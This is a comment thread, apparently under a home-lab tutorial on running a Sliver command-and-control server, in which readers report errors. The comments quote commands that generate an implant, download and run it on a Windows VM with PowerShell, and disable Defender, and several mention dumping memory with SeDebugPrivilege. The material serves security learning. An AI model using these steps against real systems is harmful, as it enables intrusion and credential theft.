84 Comments

Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.

Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!

Expand full comment

Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?

Expand full comment
Apr 11, 2023·edited Apr 11, 2023

I am getting cd: /opt/sliver: not a directory for some reason.

Expand full comment

Part 2, Step 7 gives me this error:

PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe

Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to

type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."

At line:1 char:10

+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException

+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Expand full comment

Fun stuff! I know this is old news now, but I have had two issues so far.

First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.

Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload ( love saying that) nothing happens. No joy.

I will attempt to start from the beginning and try again later today. Thanks!

Expand full comment

Hi Eric, when trying to run the C2 executable on Powershell I keep getting the error " Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" any idea how to troubleshoot? Do you think it might be Defender or because I downloaded the latest version of Microsoft and perhaps they patched the payload hmmm... I'll try to figure it out in the meantime.

Expand full comment

Hi Eric, this has been a fun project so far, thanks!

I am not able to run the netstat cmd inside sliver and can't figure out why.

So far, everything other cmd works as intended, when I run netstat it just hangs forever with no data. I have to use ctrl+C to back out.

I am connected to the active session with the use [session ID] cmd

pwd shows C:/windows/system32

I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections

getprivs cmd shows the correct process attributes as enabled (exploit was ran as admin)

I'm blanking here, any help is appreciated.

Thanks!

Expand full comment

Hi Eric, thanks for this walkthrough.

I am trying to set up or generate the C2 payload as you described(generate --http 192.168.42.128 --save /opt/sliver) for my ubuntu server via Putty(ssh) but i get the error "error:unknown command, try help"

i have tried sudo but nothing is successful

Expand full comment

Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it it showed up enabled. the next day it said disabled so I regenerated the implant and it was enabled. I then ran into errors dumping memory so I tried to use a new implant and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever ran into this?

Expand full comment

Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.

Expand full comment

Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.

It says command not found sometimes and sometimes just shows random github directory lines. Do help

Expand full comment

No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:

PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe

IWR : Unable to connect to the remote server

At line:1 char:1

+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Any initial thoughts what I might be overlooking?

Expand full comment

Got it! thanks I been experiencing my VMS are running super slow. So I did some testing and I'm using about 90% of the 16gb of ram that I have on my laptop lol. I might have to upgrade or maybe I can get my hands on a window pc or laptop.

Expand full comment

hey I'm on part two running the web server "cd /opt/sliver python3 -m http.server 80 and it saying cd: too many arguments. Any ideas on how to get around this?

Expand full comment
Apr 1, 2023·edited Apr 1, 2023

Hi Eric, I am having an error at the sliver server part, when i type the generate --http IP --save/opt/sliver" command, i get the following error: rpc error code: = unknown desc = exit status 1. Any idea what might be wrong here?

Expand full comment

On "Start Command and Control Session" step 1c where we type "http" I keep getting errors:

[server] sliver > http

[*] Starting HTTP :80 listener ...

[*] Successfully started job #1

[!] Job #1 stopped (tcp/http)

[!] Job #1 stopped (tcp/http)

I get this over and over again when typing "http"

Any ideas?

Expand full comment